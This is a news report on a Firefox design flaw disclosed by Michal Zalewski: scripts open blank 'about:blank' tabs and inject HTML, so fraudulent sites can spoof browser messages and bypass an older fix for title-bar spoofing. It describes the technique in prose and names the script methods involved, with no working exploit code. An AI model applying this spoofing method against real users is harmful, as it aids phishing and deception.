Mere days after a cookie-writing manipulation weakness in Firefox was revealed, a researcher reported that an inherent design flaw in the popular browser allows fraudulent Web sites to come off as legit. The bug also allows for bypassing of a fix for an old UI spoofing problem that supposedly had already been addressed.

The Firefox design flaw allows a script to open an "about:blank" URL in a new tab. The new tab opens with a blank address bar and appears grayed out or hidden in a new window.

A malicious script can then interact with the new document as if it were just another page under the original, legitimate domain, including allowing for the injection of custom HTML. According to Michal Zalewski, the Polish security researcher who posted the flaw on BugTraq, methods of adding the HTML, such as win.document.write(), update the document.location and the address bar to that of the interacting script.

Using about:blank, a minimal but valid HTML document, also allows for code injection through win.document.body.appendChild() and friends. When that happens, the address field remains blank, "reload" is disabled, and "page info"/"page source" menu options don't reveal any useful data.

This works to confuse the user, as a blank URL bar doesn't raise flags as would a fishy-sounding host name or URL scheme, Zalewski wrote:

"Having text displayed in a window that has an empty URL bar can confuse the user as to the origin of the displayed data or security prompts, as if they were internal browser messages; an empty address bar is considerably less suspicious than a shady host name or a panic-inducing data: URL scheme."

The old UI spoofing bug pertains to a window being opened without a URL bar and menus. An attacker in this case could use graphics and HTML controls or XUL code so that the fake URL reads "google.com." An IFRAME below could display "zombo.com." A malicious coder could also spoof a native browser-originating modal warning or dialog to trick a user into doing something stupid. This flaw was fixed by forcing the current site name to appear in the window title for all windows that lack URL bars. In that way, the Internet origin of the popup is clear, limiting the ability of a bogus site to imitate a native window.

Zalewski, who wrote that this problem is relatively minor, said that the problem with the fix is that "about:blank" windows that have no document.location defined can be used to control the window title, except for the appended "Mozilla Firefox" string. Browser UI components can be spoofed without raising user suspicions.

Zalewski pointed out a "quick if naive" demonstration of the design flaw and the fix workaround here.

Mozilla's security people are on top of mulling over fixes for the problems.